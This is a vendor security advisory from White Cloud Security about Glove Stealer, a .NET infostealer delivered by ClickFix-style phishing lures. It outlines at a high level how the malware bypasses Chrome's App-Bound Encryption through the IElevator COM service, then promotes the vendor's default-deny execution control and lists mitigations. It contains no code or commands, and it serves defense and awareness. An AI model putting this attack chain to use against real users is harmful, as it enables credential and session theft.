Glove Stealer Bypasses Chrome's App-Bound Encryption: Why Default-Deny Still Wins
A new .NET infostealer defeats Chrome's cookie protection — but only after the user is tricked into running an unauthorized script. Stop the execution and the bypass never happens.
Date: November 14, 2024 Primary Source: Gen Digital (Gen Digital) · BleepingComputer (BleepingComputer)
Executive Summary
- What: Glove Stealer is a new .NET information stealer that can bypass Chrome's App-Bound Encryption (ABE) to steal cookies and credentials, plus data from many apps and extensions.
- Who is affected: Windows users of Chromium-based browsers; data at risk includes cookies, saved credentials, crypto wallets, 2FA authenticators, password managers, and email clients.
- Severity: Medium-High — broad data theft, though distribution depends on tricking the user into running a script.
- Action required: Block the unauthorized script and stealer at execution; pair default-deny with phishing defenses and credential hygiene.
Overview
In November 2024, Gen Digital researchers detailed Glove Stealer, a .NET infostealer that targets cookies, credentials, and data from a wide range of applications and browser extensions. (Gen Digital) Its notable capability is bypassing Chrome's App-Bound Encryption — the cookie-protection mechanism introduced in Chrome 127 — by leveraging the browser's internal COM-based IElevator service to obtain and decrypt the needed keys. (Gen Digital) That bypass approach had been publicly disclosed in late October 2024. (SecurityWeek)
Critically, the bypass is not the entry point. Glove Stealer is distributed through phishing emails with an HTML attachment that shows a fake error and instructs the victim to copy a malicious script and run it — a ClickFix-style social-engineering trick — which kicks off PowerShell and the eventual infostealer infection. (Gen Digital) (BleepingComputer) It tries to exfiltrate from 280+ browser extensions and 80+ local applications, and appears to be in a relatively early stage with minimal obfuscation. (SecurityWeek)
The defensive point: the headline-grabbing ABE bypass only matters after unauthorized code runs. Prevent that, and the rest of the chain collapses — which is what White Cloud Security (WCS) Trust Lockdown does.
Threat Summary
| Field | Detail |
|---|---|
| Malware family | Glove Stealer (.NET infostealer) |
| Public report | November 14, 2024 (Gen Digital) |
| Distribution | Phishing → HTML attachment → fake error → user pastes/runs script → PowerShell → stealer |
| Notable capability | Bypasses Chrome App-Bound Encryption via IElevator COM service |
| Data targeted | Cookies, credentials, 280+ extensions, 80+ apps (wallets, 2FA, password managers, email) |
| Maturity | Early development; minimal obfuscation |
| Exploited in the wild | Yes |
Technical Analysis
How the Attack Works
Per Gen Digital, the chain runs like this: (Gen Digital)
- Phishing lure. An email carries an HTML attachment that renders a fake "content couldn't be displayed" error.
- User-run script (social engineering). The victim is told to copy a script and execute it via a terminal or Run prompt, invoking PowerShell.
- Stealer deployment. Follow-on scripts install Glove Stealer.
- Data theft + ABE bypass. The stealer harvests browser cookies/credentials — using the IElevator COM service to defeat App-Bound Encryption — plus data from many extensions and applications.
Payload and Impact
Stolen cookies and credentials enable session hijacking and account takeover; harvested wallet, 2FA, and password-manager data deepen the exposure. Because the lure relies on the user running a script, this is also a reminder that social engineering remains a primary delivery method.
Why Traditional Defenses Struggle
- User-executed scripts look like deliberate actions, not exploits.
- PowerShell is legitimate and ubiquitous, so abuse blends in.
- A new, lightly obfuscated stealer may still slip past signatures and can be rebuilt.
- The ABE bypass undermines a protection some defenders assumed was sufficient.
How White Cloud Security Trust Lockdown Stops This
WCS Trust Lockdown enforces a default-deny, Zero-Trust App Firewall: nothing executes unless it has been explicitly Approved by application, publisher/certificate, handprint, and approved parent-child relationship.
| Attack step | How WCS would help |
|---|---|
| User pastes/runs the malicious script | Parent-child execution controls help stop a browser/terminal from launching unapproved script-driven payloads |
| PowerShell-driven stages | Unapproved follow-on executables would be denied |
| Glove Stealer (.NET) runs | The unapproved stealer would be prevented from running — so no cookies/credentials are harvested and the ABE bypass never executes |
| Rebuilt binary | Handprint identity (SHA-1, SHA-256, SHA-512, MD5, CRC32, file length) means a changed hash would still be denied |
By denying the stealer at execution, WCS would help block the data theft before the App-Bound Encryption bypass can run, and would give administrators visibility into blocked applications. Scope, stated plainly: WCS does not stop the phishing email or a user copying a script, and it does not replace phishing-awareness training, EDR, or credential hygiene — it is the execution-control layer that holds when a user is tricked.
At White Cloud Security, we continue to track and report new hacking methods and tools — not just because of its immediate threat, but because patterns of reuse often expose the playbooks of these cybercriminal groups.
Recommended Mitigations
- Deploy default-deny application control so the stealer cannot execute even if a user runs the script.
- Train users to recognize "copy and run this script" lures (ClickFix-style attacks).
- Constrain PowerShell and script hosts; restrict child-process execution from email clients and browsers.
- Rotate credentials and invalidate sessions on suspicion; enforce MFA.
- Monitor for mass browser-data access and unusual credential use.
Key Takeaways
- The bypass is a sideshow — the real control point is preventing the stealer from running.
- "Paste this script" is the modern lure — execution control is the backstop.
- Handprint identity denies rebuilt stealers that defeat signatures.
- Prevention complements awareness training, EDR, MFA, and credential hygiene.
References
- Gen Digital — Glove Stealer: Leveraging IElevator to Bypass App-Bound Encryption & Steal Sensitive Data (Gen Digital)
- BleepingComputer — New Glove infostealer malware bypasses Chrome's cookie encryption (BleepingComputer)
- SecurityWeek — Glove Stealer Malware Bypasses Chrome's App-Bound Encryption (SecurityWeek)